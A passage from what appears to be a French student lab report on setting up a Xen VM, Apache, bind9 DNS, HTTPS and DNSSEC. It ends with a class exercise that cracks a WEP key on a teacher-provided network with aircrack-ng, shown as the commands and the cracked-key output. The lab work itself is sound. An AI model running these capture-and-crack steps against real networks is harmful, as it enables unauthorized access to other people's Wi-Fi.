                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
